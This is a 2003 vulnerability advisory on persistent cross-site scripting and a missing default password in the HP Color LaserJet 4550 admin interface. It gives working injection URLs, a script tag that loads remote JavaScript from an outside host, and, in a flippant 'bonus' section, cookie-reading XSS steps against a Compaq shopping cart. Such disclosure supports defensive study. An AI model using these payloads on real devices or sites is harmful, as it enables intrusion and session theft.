------------------------------------------------------------------ - EXPL-A-2003-018 exploitlabs.com Advisory 018 ------------------------------------------------------------------ -= HP Color LaserJet 4550 =- Donnie Werner July 22, 2003 http://exploitlabs.com Product: -------- Hewlet Packard Color LaserJet 4550 ( possibly others ) Vunerability(s): ---------------- 1. Remote Persistant Xss DoS 2. no default password Description of product: ----------------------- "Designed for business professionals who want to communicate more effectively using high-quality, professional - looking color documents" VUNERABILITY / EXPLOIT ====================== 1. Remote Persistant Xss DoS ------------------------------- The remote administration interface of the HP Color LaserJet 4550 uses extensive javascript in building dynamic content for administration of the printers setup and manegment. uhh oh.. Detail: by introducing XSS we render the remote interface useless... Example 1. Add Link: The HP allows an inclusion of a user definable link... http://[printer-ip]/hp/device/this.LCDispatcher?update=html&cat=0&pos=0&submit=go http://[printer-ip]/hp/device/this.LCDispatcher ------- Device: LINKS: use: <script>alert("You are vunerable to xss - discovered by morning_wood http://exploitlabs.com")</script> when re-renderd we get weird out put depending on the JS used.. some examples.. http://<iframe%20src=/ " id="lnkOtherLink0" target="_blank"> http://[printer-ip]/hp/device/htt</font></a><br></p></div><div%20id= as you can see the left hand menu has completly been rendered useless... ( sorry ) looking at the source... --------- snip ------------- } document.writeln('<div id="navcap"><img border="0" src="images/button_bottom.gif" width="140" height="21"><BR>'); string = 'Other Links'; document.writeln('<p><b>' + string + '</b><br>'); tmpString = '<a target="_blank" href="this.LCLinkedPageImpl?LCLinkedPage=html&page=my_printer" id="lnkHardLink0"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2">My Printer</font></a><br><a target="_blank" href="this.LCDispatcher?dispatch=html&page=order_supplies" id="lnkHardLink1"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2">Order Supplies</font></a><br><a target="_blank" href="http://productfinder.support.hp.com/servlet/FindIt?q=[C7085A]&t=hp&s= x" id="lnkHardLink2"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2">Solve A Problem</font></a><br>'; document.writeln(tmpString); tmpString = '<a href="http://<script>alert("You are vunerable to xss - discover" id="lnkOtherLink0" target="_blank"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2"><script>alert("Y</font></a><br>'; document.writeln(tmpString + '</p>'); document.writeln('</div>'); mapheight = navcaptop - topofbuttons; document.writeln('<div id="navmap"><img border="0" src="images/spacer.gif" width="140" height="'+mapheight+'" usemap="#buttonsmap"></div>'); document.writeln('<MAP NAME="buttonsmap">'); for (var i=0; i < buttonarray.length; i++) { document.writeln('<AREA SHAPE="rect" COORDS="'+buttonarray[i]['mapcoords']+'", HREF="'+buttonarray[i]['href']+'">'); }document.writeln('</MAP>');</script> ------- snip ------------- ouch!! Example 2. DIAGNOSTICS Network Statistics > Protocol Info Test Page system contact and system location boxes both vuln to.. <script language="JavaScript" src="http://www.astalavista.com/backend/news.js" type="text/javascript"></script> which allows remote inclusion that is persistant this writes to the rom and is viewable even over snmp I am assuming the only way to fix these issues are to upgrade the rom or reset via a CLI interface 2. no password ----------------------- if this was set this couldnt happen I guess.. ( oops again ) Local: ------ yes Remote: ------- yes Vendor Fix: ----------- No fix on 0day ( aww.. shucks ) Vendor Contact: --------------- Concurrent with this advisory support@hp.com security@hp.com Credits: -------- Donnie Werner morning_wood@exploitlabs.com http://exploitlabs.com Original Advisory at http://exploitlabs.com/files/advisories/EXPL-A-2003-018-hp4550.txt =================================== BONUS !!! EXTRA FUN WiTH HP / COMPAQ: =================================== http://www.smb.compaq.com/dcart/cart.asp? choose any product area go to shoping cart pick a product / quan go to checkout locate the "e-coupon" box enter <script>document.write(document.cookie)</script> press "Submit" laugh "real hard"